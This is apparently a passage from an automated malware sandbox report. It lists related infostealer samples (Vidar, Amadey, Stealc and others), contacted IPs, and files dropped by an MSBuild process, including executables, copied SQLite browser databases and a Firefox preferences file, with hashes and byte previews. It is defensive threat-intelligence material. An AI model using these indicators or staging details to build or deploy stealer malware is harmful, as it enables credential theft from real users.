	Monetary_Funding_Sheet_2024.js	Get hash	malicious	WSHRAT	Browse	23.199.218.33 149.154.167.99
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	23.199.218.33 149.154.167.99
	88z6JBPo00.exe	Get hash	malicious	Unknown	Browse	23.199.218.33 149.154.167.99
	fJDG7S5OD7.exe	Get hash	malicious	Unknown	Browse	23.199.218.33 149.154.167.99
	Ku8UpPuzaa.exe	Get hash	malicious	Unknown	Browse	23.199.218.33 149.154.167.99
	BvPEdRRQNz.exe	Get hash	malicious	Unknown	Browse	23.199.218.33 149.154.167.99
	uTQkPZ9odT.exe	Get hash	malicious	Unknown	Browse	23.199.218.33 149.154.167.99
	DOtQyvB2DJ.exe	Get hash	malicious	TrojanRansom	Browse	23.199.218.33 149.154.167.99
	RlPKbGYzSn.exe	Get hash	malicious	Unknown	Browse	23.199.218.33 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\DBAAFIDGDA.exe	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\DGDBKFBAKF.exe	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse

Created / dropped Files

C:\ProgramData\DBAAFIDGDA.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4929536
Entropy (8bit):	7.39389892963929
Encrypted:	false
SSDEEP:	98304:2t9Kw5Ea4QR/YUxIUnnxIMSsDPUCfCxg+6hUNLindy:mkw6ER/YUZnxIw8ICxvoQcdy
MD5:	8E5286E3CAA11C78E275892A38F2E772
SHA1:	DDADA2F646640B394C04E7166DB04200D226281B
SHA-256:	9F619F332A9E5BD74A345778E86A871E9EFB087BFEA43ADE7CBF9F63A12151B0
SHA-512:	4F180892333915A52F5E2EE7A69D0BA628ED3D6C6425E2BA4B41F0ED5A06898B25BC0A0432DC6372ADD0C811B16E74D636A6466BA64FD9CCC34A93E900B5F5CE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\DBAAFIDGDA.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: hOYGfIcBVf.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m.f..................H..x........H.. ....H...@.. ........................K...........@...................................H.K.....I..p....................K.......H.............................................. ............... ..H............text...$.H.. ....H................. ..`.sdata........H.......H.............@....rsrc....p....I..r....H.............@..@.reloc........K......6K.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAAFIDGDAAA\BFHDAE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAAFIDGDAAA\BFHDAE-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAAFIDGDAAA\CBAKJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAAFIDGDAAA\CFHCGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAAFIDGDAAA\FCAFIJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAAFIDGDAAA\FHCAEG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAAFIDGDAAA\GIJJKF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAAFIDGDAAA\HJDBFB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DBAAFIDGDAAA\IDGHDG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAAFIDGDAAA\IDGHDG-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAAFIDGDAAA\KECBGC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAAFIDGDAAA\KKFBAA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGDBKFBAKF.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5109736
Entropy (8bit):	7.432541336885682
Encrypted:	false
SSDEEP:	98304:XlawqpTSo3yQr+MykPTcY/BUeAALrzqjx764OFQVf:Xla82r+MykPTh6Pwq8aVf
MD5:	675737D9B22BCFEFE651C11BD47D404C
SHA1:	4B49F56572B458873B52EAA990F09556D37A54A1
SHA-256:	8B020CDE39D33B53F4C48A8C7EA30FB1F7854B13562508C0A1665FFD1397F7FC
SHA-512:	0F25D1CC861C781A2BABA08F0297963672DF51A328A37038455AAABD8953F3AD38B04FBEA473139FC6CD16004905556368B919325F0B72FAEB16D0DCFAE8D2A2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\DGDBKFBAKF.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: hOYGfIcBVf.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.f..................K..@........K.. ....K...@.. ....................... N......oN...@.................................P.K.K.....K..8............M.......N.......K.............................................. ............... ..H............text.....K.. ....K................. ..`.sdata........K.......K.............@....rsrc....8....K..:....K.............@..@.reloc........N.......M.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCGCBFHCFCFB\EGIJKE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCGCBFHCFCFB\JJDGCG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_85f5fef5b322d3e0e9fdef94d1761a36736fc146_01a8d73d_6eb29486-85a4-4d90-a655-4b6584a88ff2\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2841994743320604
Encrypted:	false
SSDEEP:	192:JmX+QcOQf50Nvw4sjMAZrdAmALPUzuiFFZ24IO8q:IuQQfaNvwpjJa7UzuiFFY4IO8q
MD5:	F6391FE3C497E279393231AAA37A1164
SHA1:	7D3B522CDB537689F5792DE31F2EF89EA01055A8
SHA-256:	C9ED42E22A59C80066C2C3BB8B6AAA581CE4239F5CBEA98C789CE716D97FE045
SHA-512:	0C1E5831F701A13370AD756189CEC01FAB2BCE1E09E3BC8A68FEC359931FDF0A74B819825B3C8CC847AFA107D4913E1BE0941F0C745744E2B9FC94B95FE8B9F4
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.8.6.6.1.9.3.7.3.6.7.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.8.6.6.2.0.1.7.0.5.5.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.b.2.9.4.8.6.-.8.5.a.4.-.4.d.9.0.-.a.6.5.5.-.4.b.6.5.8.4.a.8.8.f.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.d.b.5.6.f.4.-.b.f.6.9.-.4.0.9.2.-.8.7.6.f.-.2.6.b.4.4.a.e.6.e.b.e.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.7.0.-.0.0.0.1.-.0.0.1.4.-.7.6.4.9.-.d.c.b.2.7.c.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.6.2.5.6.a.0.1.5.9.6.8.8.f.0.5.6.0.b.0.1.5.d.a.4.d.9.6.7.f.4.1.c.b.f.8.c.9.b.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5FAD.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Jul 26 16:56:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	188616
Entropy (8bit):	1.9662286832348366
Encrypted:	false
SSDEEP:	384:8nHKsPNBbZRrzBezhOyNElJYX237l57NDX6D05KbXpawhhT2fWto/4xbnb7xRo/N:gKSjZRnBe7EE+7L7FsawTzWq7for
MD5:	A12006C12981BE4207E6422E8D4D50B9
SHA1:	C4E3BDEC4307051454A75434B826608875398E36
SHA-256:	743256B56C9FBB6CC86FD6FFCA1E54E48058387D24A369011ED7DEC23990E834
SHA-512:	1E0291A4967E86EE92166ED6CF2D61679F03E1DFAC4326834167B1C436BB7A18588120CBBBC34683B4742467353CEC0239A770BC33E61DE3A812B2D71B330834
Malicious:	false
Preview:	MDMP..a..... .......[.f............D...........\)..X.......$....2..........Le..........`.......8...........T............w...h...........2...........4..............................................................................eJ......\5......GenuineIntel............T.......p...#.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER61C2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6320
Entropy (8bit):	3.7208186204293066
Encrypted:	false
SSDEEP:	192:R6l7wVeJUS6c8Y8JqQwprQ89b1fsf3Pnm:R6lXJ56nY8Jqf1Ef3u
MD5:	138E35D5A40F982F0B9B15113F514CF3
SHA1:	FFBB9B9C2593A287C042F2EA9CAE0054C7112E0F
SHA-256:	56FF7D586E7BA1C1857F258F690F8AA291C4FBCE2C7D230578745F0F47AC1462
SHA-512:	E181DDFE3B9B632D8E9DB37946340443B40BBD94F449506BFEB5B45AB5597705A70B9F8CCF3354E4782B053B7660E324C13D17398462563591125B828A4697C7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER61F1.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4642
Entropy (8bit):	4.45645565642651
Encrypted:	false
SSDEEP:	48:cvIwWl8zs9Jg77aI90vWpW8VYZYm8M4JzjFT4+q81UmLRd:uIjfXI72+7VpJZ4bmLRd
MD5:	41F4A9D2DB229EDFAEAD05BBF3DFA856
SHA1:	BE95BB55078036FA5187FF44953F1BBDDF4608E9
SHA-256:	2A3393E470F3179C1D637868074CD9E51359CF57D44205ACB8AE4E37B5AAC79E
SHA-512:	DF8AD8C52812DEA3EA74D12505DDA9C0018CB9676611200795E84EA4257DBFB8D96B075618B44A1321F87D3E43B295037889E5039A4F57B54A04AB0C7C23EC09
Malicious:	false
